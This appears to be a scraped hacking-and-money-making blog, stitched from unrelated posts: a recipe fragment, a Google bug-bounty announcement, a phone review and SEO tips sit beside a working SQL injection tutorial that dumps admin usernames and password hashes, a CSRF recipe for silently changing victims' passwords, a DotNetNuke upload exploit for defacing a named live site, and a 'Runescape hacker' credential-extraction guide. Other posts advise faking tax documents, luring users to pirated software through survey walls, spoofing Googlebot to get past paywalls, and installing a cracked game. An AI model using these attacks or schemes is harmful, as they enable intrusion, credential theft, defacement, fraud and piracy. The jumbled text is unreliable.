So one of the Oldest Dishes made by me and Too Simple.. even a child can make it at Home. This is a Fusion of Indian and Spanish Taste and Cooking. And when I made this Dish first time.. I was quite Proud of myself. Come On.. I was just 13 Years old.. :P. In This Recipe...Tomatoes are doing the Magic.
first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"
you will get the downloading link in comments zone
now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!
download and install hexworkshop now dont ask for link...google is your friend
now right click on tool ,,you will see "Edit this with HexWorkshop"...click it
you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!
now press ctrl+f... a boz will appear
-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.
-Now Enter "Gmail" to the Box and Hit "Find".
-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.
-Copy the Highlighted text and Paste it in a Text document (Newly Created).
-Remove the [.]>DOTs and You will see The Email ID + the Passwd.
Back in January of this year, the Chromium open source project launched a well-received vulnerability reward program. In the months since launch, researchers reporting a wide range of great bugs have received rewards — a small summary of which can be found in the Hall of Fame. We've seen a sustained increase in the number of high quality reports from researchers, and their combined efforts are contributing to a more secure Chromium browser for millions of users.
Today, we are announcing an experimental new vulnerability reward program that applies to Google web properties. We already enjoy working with an array of researchers to improve Google security, and some individuals who have provided high caliber reports are listed on our credits page. As well as enabling us to thank regular contributors in a new way, we hope our new program will attract new researchers and the types of reports that help make our users safer.
In the spirit of the original Chromium blog post, we have some information about the new program in a question and answer format below:
Q) What applications are in scope?
A) Any Google web properties which display or manage highly sensitive authenticated user data or accounts may be in scope. Some examples could include:
For now, Google's client applications (e.g. Android, Picasa, Google Desktop, etc) are not in scope. We may expand the program in the future.
Q) What classes of bug are in scope?
A) It's difficult to provide a definitive list of vulnerabilities that will be rewarded, however, any serious bug which directly affects the confidentiality or integrity of user data may be in scope. We anticipate most rewards will be in bug categories such as:
* XSS
* XSRF / CSRF
* XSSI (cross-site script inclusion)
* Bypassing authorization controls (e.g. User A can access User B's private data)
* Server side code execution or command injection
Out of concern for the availability of our services to all users, we ask you to refrain from using automated testing tools.
These categories of bugs are definitively excluded:
* attacks against Google’s corporate infrastructure
* social engineering and physical attacks
* denial of service bugs
* non-web application vulnerabilities, including vulnerabilities in client applications
* SEO blackhat techniques
* vulnerabilities in Google-branded websites hosted by third parties
* bugs in technologies recently acquired by Google
Q) How far should I go to demonstrate a vulnerability?
A) Please, only ever target your own account or a test account. Never attempt to access anyone else's data. Do not engage in any activity that bombards Google services with large numbers of requests or large volumes of data.
Q) I've found a vulnerability — how do I report it?
A) Contact details are listed here. Please only use the email address given for actual vulnerabilities in Google products. Non-security bugs and queries about problems with your account should should instead be directed to the Google Help Centers.
Q) What reward might I get?
A) The base reward for qualifying bugs is $500. If the rewards panel finds a particular bug to be severe or unusually clever, rewards of up to $3,133.7 may be issued. The panel may also decide a single report actually constitutes multiple bugs requiring reward, or that multiple reports constitute only a single reward.
We understand that some researchers aren’t interested in the money, so we’d also like to give you the option to donate your reward to charity. If you do, we'll match it — subject to our discretion.
Regardless of whether you're rewarded monetarily or not, all vulnerability reporters who interact with us in a respectful, productive manner will be credited on a new vulnerability reporter page. If we file a bug internally, you'll be credited.
Superstar performers will continue to be acknowledged under the "We Thank You" section of this page.
Q) How do I find out if my bug qualified for a reward?
A) You will receive a comment to this effect in an emailed response from the Google Security Team.
Q) What if someone else also found the same bug?
A) Only the first report of a given issue that we had not yet identified is eligible. In the event of a duplicate submission, only the earliest received report is considered.
Q) Will bugs disclosed without giving Google developers an opportunity to fix them first still qualify?
A) We believe handling vulnerabilities responsibly is a two-way street. It's our job to fix serious bugs within a reasonable time frame, and we in turn request advance, private notice of any issues that are uncovered. Vulnerabilities that are disclosed to any party other than Google, except for the purposes of resolving the vulnerability (for example, an issue affecting multiple vendors), will usually not qualify. This includes both full public disclosure and limited private release.
Q) Do I still qualify if I disclose the problem publicly once fixed?
A) Yes, absolutely! We encourage open collaboration. We will also make sure to credit you on our new vulnerability reporter page.
Q) Who determines whether a given bug is eligible?
A) Several members of the Google Security Team including Chris Evans, Neel Mehta, Adam Mein, Matt Moore, and Michal Zalewski.
Q) Are you going to list my name on a public web page?
A) Only if you want us to. If selected as the recipient of a reward, and you accept, we will need your contact details in order to pay you. However, at your discretion, you can choose not to be listed on any credit page.
Q) No doubt you wanted to make some legal points?
A) Sure. We encourage broad participation. However, we are unable to issue rewards to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. This program is also not open to minors. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.
This is not a competition, but rather an experimental and discretionary rewards program. You should understand that we can cancel the program at any time, and the decision as to whether or not to pay a reward has to be entirely at our discretion.
Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.
Thank you for helping us to make Google's products more secure. We look forward to issuing our first reward in this new program.
The emerging mobile company ‘Spice’ has become the first mobile company to launch 3D display mobile handsets in India. The new mobile hand set is lashed with several peculiar functions with the stunning function of 3D display screen named “View D”.
As per report of sources, View D makes user capable of experiencing images, videos and even the interface in 3D. The mobile hand set is laced with a specific kind of display screen know as auto-stereoscopic display and it will make the users to experience the 3D view without polarizer glasses(3D glasses).
Apart from the 3D display the handset is equipped with many other attractive features. The display of the mobile is designed in such a way that user can have its choice whether to enjoy the 2D or 3D view. The mobile has also an eccentric characteristic know as ‘remote wipe’ which deletes the mobile data remotely. This is done by sending a unique sms (the sms works as a command to delete the data) to the mobile phone.
Sleek and gorgeous looking View D is equipped with 2.4-inch screen; fine sound quality integrated speakers, 2MP camera, FM radio, MP3 player, GPRS, WAP and 16 GB expandable memory. The price of the stylish is Rs 4299.
At a press conference, the CEO of Spice Mobiles Mr. Kunal Ahuja said that the Spice View D would fulfill the latest demands of smart mobile phone users. He further added that they were very keen to bring something innovative, something technically cool and the latest launch satisfied their eagerness
Overview Body Type Bar
Battery Life/Talk time 4.5 Hours
Standby Talktime 260 Hours
Dimensions Width 51 mm
Depth 13 mm
Length 115 mm
Weight 70 g
Camera Camera Yes
Camera Resolution 2 MP
Display Display Size 2.3 inches
Display Resolution 240 x 320 pixels
Dispaly Type TFT LCD
Memory
Card Slot Yes
Complimentary Card N/A
Multimedia Features FM Radio Yes
MMS Yes
MP3 Player Yes
Connectivity Options
Bluetooth Yes
USB Connector Yes
GPRS Yes
WAP Yes
Technology Cellular Network GSM
SIM Type Dual SIM
Features Input Type Alphanumeric Keypad
Handsfree Speaker Yes
Its about :- Increasing Twitter Followers, Getting Facebook Page Likes as well as Visitors for your site. (For Free)
How does twiends works ?
twiends.com provides introductions to people looking for friends and followers. We use a fair credit system to create the incentive for you to check someone out. When you follow someone you earn credits from them, and vica versa when they follow you. You can decide how many credits you want to offer per follow, and when you run out you remain on the list so people can still follow you if they like. We focusing on making the introduction, and you focus on deciding who you want to be friends with in the long run. Despite our name, we are not a "get followers fast" site or a follower train. You get to choose who you friend and they get to do the same. In saying that though, you will find that a lot people will follow you because you are on the site. Our focus is community building.
SQL injection is a code that exploits a vulnerability in the database of a website.
Step 1
Firstly we will find a site which is vulnerable to SQLI .
So surf the site till u get to a URL which looks like this -:
www . prateek . com/articles/index.php?id=213
By this i mean a url ending with something like this "php?id=213"
Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.
Example = > www . prateek . com/articles/index.php?id=213'
If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.
Ok so now we will proceed to the next step
Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.
Example = >www . prateek . com/articles/index.php?id=213 order by 10--
So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.
Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--
Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.
So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--
As there were 5 columns we selected all the 5 columns.
When we execute this URL then on the page there will be number(s) displayed.
Like 2 or 3 or 4 etc.(This will not be greater than the number of columns) Step 4
Now the number which appeared we have to remember it as we will use it in the next step.
Let us assume that number 3 appeared.
So now we will check the version of MYSQL with the help of this number
Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--
We used the @@version command to find out the version bieng used.
We replaced the number 3 (as we had got it in the last step) with @@version
Now after executing this the version number will be displayed. Step 5
like = > 5.0.51a-community
Now as the version is above 5 its fine.
Now we will find the names of columns and tables.
This will be done by -:
Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--
After executing this , names of tables will be displayed.
It maybe anything .
Not them down. (choose names having admin , username , user etc in them)
Now we will find the names of columns
Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--
After executing this , names of columns will be displayed.
It maybe anything .
Not them down. (choose names having password, username , pass etc in them)
you might think what happens when you don't see a column like username or password?
then you have to do a little guessing.
Step 6
Now we will move further.
And place the names of columns and tables we noted down in the URL
Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--
In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).
Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)
Procedure:
1) First of all we have to make sure that its a 1 GB memory card. This only works on 1GB And it supports only in some of the rare cases of memory cards.
2) Now Backup all your data in that because we have to format the drive.
3) After backing up now open the Skimedi Fix 2GB Capacity application. i will upload a link at the end of post.
4) A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located (generally G: or L: drive for USB sticks)
5) After selecting the drive press on FIX and then the updating process will be followed up. It will ask your conformation whether you agree to format or not. click on yes.
6) Later it will ask to replug the device. Just replug the memory stick card and put it back. The size of the memory will be increased from 1Gb to 2Gb. you can see the properties before and after the cracking process.
7) After that you can also check the memory size in phone and also you can test the size by copying all the data to it which is around 2Gb.
8) I personally tested this and now i have converted my 1Gb to 2Gb and using 1.8 space with no problem.
9) You can reopen the Skimedi Fix and select the drive again where it shows us the size as 1912mb which is nothing but 2Gb.
10) Some times we get a parameter error while copying the files which have crossed the 1Gb size so this may not be 100% successful. http://ougfiles.com/dl/82885090/skimedi_fix.rar
CPAlead is no joke, Couple of my friends have been with CPAlead for over 1 year now and have made roughly 30,000$ ever since, one in particular his name is Alex he is a twenty two year old college drop out, his parents stopped supporting him when he dropped out he was left with a small apartment and literally 230$ in his pocket. He discovered CPAlead one night and from that night on it was a wrap, He's raking in about 7,000$ a month till this day, He has taught me the rules of trade pretty much everything I know, Now I'm teaching you guys! Everyday I browse the "monetizing techniques" I see threads like "Need help making $$" and plenty more, That is the only reason I'm making this tutorial, for the unfortunate people who don't know how to code a language, for the people who think posting adylf links is bringing in a decent income for them, for the people who beg for money..I guarantee that you will make money if you follow this guide word-for-word. Still not convinced? Here is some proof CPAlead is a cash pot..When you register for CPAlead there's a chatbox and you can see what people earn daily, monthly and lifetime..
Chapter two
getting started
Before we begin the thing first you will need to do is register to CPAlead, If you haven't already, you can start by going Here | Here The second link is my referral link, I don't expect you to register under me nor is it mandatory but it helps me just a little, but the choice is yours. Registering to CPAlead is a little tricky because it's solely based on if you get accepted or not, the biggest obstacle for most people is the tax-document procedure they require you to fill out. When you fill out the tax document it's recommended you use real information but it's not enforced. I personally used fake information and got accepted in three or four business days
After you've registered on CPAlead and activated your e-mail with your account, it's best for for your self to get familiar and comfortable with the dashboard AKA control panel. The first thing I advise you to do is go to the to "Account" located on the menu bar. When your there your going to see general payment information choose the minimum pay out you would like to receive and also choose your preferred payment type (I suggest choosing the lowest because you are new to CPAlead) Next you should see PayPal payment information put your PayPal E-Mail there (only if you choose to paid via PayPal of course) That's it for now, I've pretty much covered the most important things to setting up your account, Let's move on shall we?
Chapter three
competition
You need to find what your going to monetize. Finding something to monetize is very easy but at the same time very difficult, Why? One word competition, Let me make an example..If there's ~30 million people on the internet less then 1 million users are internet marketers or make money off the internet (These numbers are not correct they are based off estimates) Why does this matter? Finding some monetize is luck it's based off how much competition you have and your content. Let's say you decide to monetize "Weight loss supplements" Overweight and obesity is the #1 problem in America, Meaning 40% of the users on the internet will search "weight loss pills" "pills that make you loose weight" "weight loss diet" Take a look at these images this is information taken from Google Keyword tool (I will explain this beautiful tool in detail further we go into the tutorial)
Take a look at the first image, You see "weight loss pills" 550,000 searches in two weeks* The competition is at an all time high. Look at the second images, Just like I said America is the country that "weight loss pills" has been searched the most, Anything dealing with "Weight loss" will always be an automatic hit, it will never die out, BUT there is a lot of competition for this which is a bad idea but if you have unique and pay for advertising then you make can make tons of money off this but since your new I strongly recommend you stay away from anything that has competition. Monetizing anything like that takes a lot of experience which I will not go into detail with, In the next chapter we will set up your first CPAlead ad and explain how to you how you can find your own.
Chapter four
your first monetize
So it's time to set up your first CPAlead advertisement. CPAlead pays you a certain amount of cash for every time someone does your survey the amount can be anywhere from 00.01 to 5.00$ Finding what to monetize is a vital part. Below I will write a brief summery on finding what to monetize
Finding what to monetize: The most easiest thing to monetize is with down-loadable content such as software; software is something that people are always trying to get for free: When finding what kind of software to monetize it's best to choose software that people are paying for already, meaning if people value the software enough that they're paying money of their wallet it's going to be worth doing one survey to get it. Basically you just have to make sure whatever your going out for free it's worth the time that people will spend 5 minutes filling out a survey.
So with that being said, we're going to be monetizing "Software" as an example to all of you for this tutorial. Now finding the right type of software you want to look for popular best-selling type soft; A really good method on finding what are the best selling software is by heading over to Amazon.com then go to the software section and click on best sellers.
The image above shows the top 8 software best-sellers (out of 100) Now if you were to create a site for all 8 sites that will guarantee you at least 100$ weekly. So after you found what software your going to monetize you will need to create a website for it and add your CPAlead widget to it.
For this tutorial I will be monetizing (Adobe Photoshop Elements 8) as an example to all of you.
Chapter five
building and advertising
Before we being the advertising your going to need a couple things
* Youtube Account
* Webhosting
* Windows movie maker
After you've gathered all everything stated above we can begin the process of advertising.
The video
Creating the right type of video is vital, "A picture is worth a thousand words" in this case it's worth your income, but wait were doing a video what does a picture have to do with it? Remember what software I was going to monetize? it was Adobe Photoshop Elements 8
“adobe photoshop elements 8 free download” results 1 - 20 of about 93
Adobe photoshop elements 8 does not have a lot of competition, there's only about ~100 videos of people giving out free, that is good thing! Why? Less people giving it out means more money for you! You have to take advantage of this.
It's time to set up the advertisement. This is where the list of things you needed comes in handy, a youtube account, windows movie maker and free/paid web hosting.
Ahead over to Google and under images search what the software your going to monetize with, for this tutorial we're monetizing Adobe Photoshop Elements 8
Here are some very very good examples of what to use in your video, those images will appear in your thumbnail, when they look at the thumbnail they're going to see the actual program view from the desktop so it'll make it more believable. After you've found the right image save it to your computer and open up Windows movie maker, click on import media and find the image. Timing; You have to make sure your video is at least 1 minutes and 30 seconds long why? Put your self in your customers shoes for a moment. If you were looking for software would you rather go to a 40 second video containing a link to an anonymous download site OR would you rather look at a video that is 2 minutes long video. Exactly you have to do what ever it takes for them to just click on your link. (you get paid for how many people visit and click your surveys as well) Music is optional, I personally prefer soft music to breed trust and calm vibes, if you put a rap/rock what will the user think about a song "Kill Kill 666 money hookers drugs guns"
Your out come should look something like this, remember to expand the time to at least 2 minutes long. It's optional to add titles or credits saying "Link in description" I usually don't cause the users should have the common sense to check the description box, if you do decide to add annotations use the youtube feature instead.
Uploading to Youtube. When your finish editing your video in windows movie maker you can go ahead and upload it to youtube.
Keywords. Without keywords no-one will be able to find your video so you need to make sure that you have the right title and keywords. For the title I suggest you putting something along this line
* FREE Adobe Photoshop Elements 32/64 BIT FREE
* Adobe Photoshop Elements 8 - Key-gen w/ Download
* Adobe Photoshop Elements 8 w/ Commentary
* Free Adobe Photoshop Elements 8 Download
Choosing the right keywords for your video is a very important step. I have provided some useful tools to choosing the right keyword for your video.
Google AdWords
https://adwords.google.com/o/Targeting/Explorer?__u=1000000000&__c=1000000000&stylePrefOverride=2#search.none!ideaType=KEYWORD&requestType=IDEAS
That pretty much sums everything that has to be done with video, we'll now be working on the actual website and how design/set it up.
Your Website
Building your website is very easy. You have 2 choices here, you can either redirect people to your website or create a blog and redirect them there, I personally redirect them to my blogspot then to my domain, here is an ideal look for your blog.
-
If you don't like bogs you can go with creating a simple HTML page, make sure you add a breif summery of the product and a retail box picture of the software just like I had one in my blog. *You can't add CPAlead widgets to blogspots you need to redirect them to your actual site*
I recommend you don't buy a domain like a .info or .com or .net..you should stick with free host web sites for now, when you become more experienced and have more knowledge with monetizing techniques and find your own niches you should invest ~20$ for a .com and web hosting, this is only good for one niche for example if I bought abc.com that is only good for movie advertisement.
finding software
Now of course your going to have to find software to give out to your users, this is easy you can either use Torrentz or Warez forums. DO NOT UPLOAD TO YOUR WEBHOST. You need to link them to the rapidshare link or torrentz link, never never have the actual download from you web host, this will lead to copy right problems.
CPAlead widget
Here comes to easiest part of the tutorial! Building your CPAlead is easy but there are some rules that you will have to follow, which benefits you 100% Ahead over to CPAlead and go to the control panel. Click "Widgets"
Create new widget > File Download > Web page containing file(s)
Instructions on how to set up your CPAlead widget.
It is here by popular demand !! :-) Even if you know every bit of it, reading wouldn't make you feel that your time was wasted! Lets not talk much and come straight to the point.
__________________________________
__________________________________
What Are Key words?
Keywords are words or phrases normal people like you and me use to search stuff online. Keyword Analysis is seeing your blog through the reader's eye and making certain amendments in blog posts to hover that x-tra traffic. Simple isn't it? :->
There are many keyword analysis tools on the internet, but the most preferred, best and accurate one is Google Adwords Keyword Tracker which you can find here -
Go there and you would easily figure out what to do. There is a box on the top left corner that read 'Word or phrase (one per line)' , enter as many keywords or phrases you want to use. If you want to check weather a domain is good with keywords there is an option for that too just next to the previous one. Don't worry if you dont get it next post will be very well explanatory!! :-)
How To Use Keyword Analysis
Okay, so after you go there, you can search whatever you want and you would be amazed to see the result. Always try for something that has less competition, good number of visitors and which is interesting enough for you to blog about ! :-)
I searched Article Marketingand here is a little short cut of the result. Please note that not only keyword that i chose but also related keywords show up with competition and number of searches and so on.
Check out this screen shot - http:// img7.imageshack. us/img7/2032/48567444.jpg
Now, I liked the second result. Many people search for it and it is gaining boom day by day so how about writing a piece of article with it? I am not going to write a complete article , but would rather give hints so that you can analyze it for future use, because you don't write about the same thing as I do !!
Okay so i chose Article Marketing Strategy to write on. Lets see how to use it.
So the very first thing I would do is writing my heading. I would probably go for - The Secrets Of Online Marketing Strategy - Revealed
Catching, isn't it? :-> Straightforwardly telling search engines and off course the reader, that this is what my blog has to offer. No fuzz, remember - we like to keep it simple ! :D
After that, start you blog post and include the same keyword (Article Marketing Strategy) in the middle of your post and once in the end. How long the post is doesn't matter at all !! The inclusion of keyword MUST not look deliberate and stuffed, and hence for that you have to alter you writing a bit. Also, don't stuff keyword again and again, search engines are cleverer than you. Your blog may face a BAN !! :|
That's not all. You can also include popular keywords in that search in your blog post, but still remember not to use it very much. 3% to 5% is highly recommended. Go to this link where you can track the percentage of keyword in your article !! :D
So that's all from me. I have touched the basic and believe me that is all you need, nothing else. Practice this for sometime and you would be a pro at this craft without even realizing it. And + the traffic would be better than ever.
Alright, before I begin, I'd like start out by clearing up some common misconceptions about of CSRF (pronounced "Sea Surf" or simply C-S-R-F). Most people believe that CSRF is the same as Cross Site Scripting, also known as XSS, due to both of these types of attacks having the phrase "Cross Site" in them. This couldn't be further from the truth. CSRF and XSS are both COMPLETELY different attack vectors. With XSS, the attacker inserts some text, such as Javascript code, onto the vulnerable site by sending the victim a prepared link. An example of this would be
alert('whatevergoeshere').
With CSRF, however, the victim sends the attacker's request to the server without them even knowing about it. I'll explain this in a bit.
Cross-Site Request Forgery
Alright, before I begin, I'd like start out by clearing up some common misconceptions about of CSRF (pronounced "Sea Surf" or simply C-S-R-F). Most people believe that CSRF is the same as Cross Site Scripting, also known as XSS, due to both of these types of attacks having the phrase "Cross Site" in them. This couldn't be further from the truth. CSRF and XSS are both COMPLETELY different attack vectors. With XSS, the attacker inserts some text, such as Javascript code, onto the vulnerable site by sending the victim a prepared link. An example of this would be
alert('whatevergoeshere').
With CSRF, however, the victim sends the attacker's request to the server without them even knowing about it. I'll explain this in a bit.
What is cross site request forgery?
Cross-site request forgery is also known as CSRF works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls allowing specific actions to be executed when it’s requested. If a user is logged into the site and an attacker will be able to trick their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. The CSRF vulnerability lies in most every Website, but it has remained mostly under the radar for nearly a decade — it’s not even included in the Web Security Threat Classification, OWASP Top 10 or Mitre Corp.’s . One of indonesian security expert, zoiz , even says that CSRF ’s able to cause DOS attack against webserver by manipulating the amounts of GET request. well , it’s really horrible
How does it works?
One possible way of using CSRF to attack a website would be to lure your victim to your website with a simple image tag that will log your victim out of a site. You could do this using;
<*img src="http://websiteyouwantthemloggedoutof.com/logout.php" height="1" width="1" /*>
This of course will simply log them out of the site they are logged into that you have chosen. You, of course, would need to know which site that you want them logged out of to use this. Of course, this is a pointless task, but it's simply to show the basic logic behind a CSRF attack. You can use this basic concept for other things, such as removing funds out of your victims financial account and transferring it into yours, deleting users from a specific site, etc.
So know we want to use this vulnerability for our own advantage.
How about changing the user’s password?
Ok so to change the user’s password you need first to create an account in the vulnerable website.
Then, go to the change the password page.
Consider that the webpage url is
(we consider that we have changed the password to gtfobc)
After that we go to our avatar to change it
Usually they will ask you two things:
1-upload an image (you don’t need it or maybe you can use it to upload your shell but chances of making this attack work are low but worth a try)
2-image from a url (here we will use it)
So we will put “/reset.php?pass=gtfobc”(without the quotation marks) in the url for the avatar.
(We didn’t use http://websiteyouwantthemloggedoutof.com/reset.php?pass=gtfobc cause you are in the site you are not redirecting him from another site)
And press ok.
Now if the user wants to check you avatar he wont see a thing (a blank page or an error).
But what the victim doesn’t know is that his password was changed to “gtfobc”.
The rest is easy.
That's it for this tutorial, I'm not going to spoon feed you information, this information is MORE than enough to help you on your way to, do whatever you want. :)
Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.
Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
Voila! You're done!
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Ps:
Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension
n00bs can also try both of these websites for testing purpose.
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.wittur.se ..the image is located at location- http*://www.wittur.se/Portals/0/SHM.jpg*
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg.
Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
Now here is the exploit Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxHOW TO RUN ?
Simply copy paste it as shown below:
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site
After selecting the third option, replace the URL bar with below script
After running this JAVA script, you will see the option for Upload Selected File Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...BINGGOOOOOOOOOOOO you have hacked the website.
What is Adsense Revenue Sharing Program
This method is particularly useful for those people who dont have a running blog so couldn't get much through adsense.This method is called Adsense Revenue Sharing program.
Have already heard anything about Revenue Sharing Sites?Revenue Sharing Sites are sites which place ads (particularly from adsense) of its members throughout its website. The site ads and the member’s ads impressions will be divided according to the site’s rules. Revenue Sharing Sites can be a Social networking, Forum or Article Marketing Website.
Does it violate TOS of Adsense?As of now, I haven’t found any conflicts of this concept to the TOS of Adsense. If you are worried that this might be an illegal way of earning in adsense then as of now, it is not directly define in any sentences within the TOS of adsense. There are a lot of Revenue Sharing sites that exist for a very long time now. A very popular Revenue Sharing Forum Site is the DP or Digital Points. DP is doing this concept for how many days and months still, there are no reports from its members of getting suspended by adsense because of joining the site. Getting to Know Revenue Sharing Sites As I have said, this kind of site can be in form of forum, social networking or article submission site. Adsense, as we all know can pay you by the number of page impression who have made with their adsense placing on it. In a forum revenue sharing site, it works based on your activity. If you post messages on discussions or making your own discussions, everytime a visitor hits and read that page and your ads is currently in display, you have a great chance on earning from it. The key on this kind of forum sites is to be active and make discussions that are interesting. For social networking site, it works when someone view your profile. Some other sites would offer a random placing of ads on the top of their every page. For article submission sites, it works when someone view your article. The ads will match to the article that you have made, so the possibility of ads getting click by the reader is very high.
If you are an adsense user and you think that your blog or website traffic is not enough to make a good traffic to earn with your adsense, you may want to try on joining to this Revenue Sharing Sites.
Increase your adsense earning through revenue sharing
Step 2. During registration, they will ask for ur adsense ID, you will get this id from ur adsense account. It looks like this pub-32323433230230 . Just copy and paste it there.
Step 3. Now create a blog on yousaytoo.com and post more and more topics,whoever read ur blog and make click on the ads ,you will be rewarded in the adsense.
Its really easy way to earn as yousaytoo has huge traffic . I m earning 2-3 $ daily in this way.
How will i know how much i have earned ?
We don't have such information. You need to login to your Google AdSense and/or Amazon affiliate accounts to find out how much you've earned.
You can track your earnings from Google AdSense on YouSayToo by adding a new URL channel in your Google AdSense account. To do that, login to your AdSense account and go to AdSense Setup --> Channels then go to URL channels and add a new URL channel www.yousaytoo.com
All revenue sharing sites have their policies like some sites have 50% ads policy,which means if you have make a post on some revenue sharing site and there are 20 clicks on the ads then 10 goes to your account and 10 goes to the webmaster.
Some sites have 75% policy means 3 out of 4 are yours and some also have 100 % .
Transformers: War for Cybertron challenges players to become the ultimate weapon as a TRANSFORMERS character in the final, epic war that will determine the survival of their entire race. Armed with a diverse arsenal of lethal, high-tech weaponry and the ability to instantly convert from robot to vehicle at any time, players will engage in heart-pounding battles on land and in the air in this gripping, 3rd person action shooter set in the TRANSFORMERS' war-ravaged homeland. Complete with several multiplayer modes, Transformers: War for Cybertron allows gamers to play through story missions with their friends in drop in/drop out online co-op and compete in blistering head-to-head multiplayer modes.Key Features:Become the Ultimate Weapon for Survival – Gamers can instantly convert from robot to vehicle form with the push of a single button, anytime and anywhere, allowing players to strategically demolish their enemies through a diverse variety of gameplay environments.Take the Epic War Online – For the first time in a TRANSFORMERS game, fans can play through each adrenaline-fueled campaign, as AUTOBOTS or DECEPTICONS, with friends around the world in drop–in/drop–out online co-operative play, and compete against one another in a bevy of intense multiplayer game modes.Experience the Legendary Conflict from the Beginning – Developed in close collaboration with Hasbro, the storyline introduces entirely re-imagined visualizations of everyone's favorite characters that comprise an original contribution to the official TRANSFORMERS canon. Players will embark on the epic journey through the most pivotal moments of the final war for the TRANSFORMERS' home planet of Cybertron.
Publisher:City Interactive Developer:City Interactive Genre:Action ESRB:MATURE ESRB Descriptors:Blood, Violence, Language
كود:
Operating System: Windows XP/2000 or Windows VISTA Processor: Intel Pentium 4 2.4GHz processor or *****alent Memory: 1 GB RAM (Windows XP/2000), 2 GB RAM (Windows VISTA) Hard Drive: 4.0 GB of free hard drive space for installation Video Card (graphics): ATI 9800PRO/GF 6600 (128MB RAM) or *****alent Sound Card: 16-bit sound card with EAX 2.0 compatible with DirectX 9.0 DirectX: DirectX DirectX 9.0c or higher (included on the DVD) Mouse, KeyboardRelease Medium Quad speed DVD-ROM
كيفية تشغيل اللعبة:
1: قم بفك ضغط الملفات . 2: قم بعمل Mount لملف الـ ISO الناتج من فك الضغط . 3: قم بعمل Install للعبة . 4: قم بنقل الكراك المرفق داخل ملف الـ ISO فى DVD فى فولدر SKIDROW لمكان تسطيب اللعبة . 5: شغل اللعبة .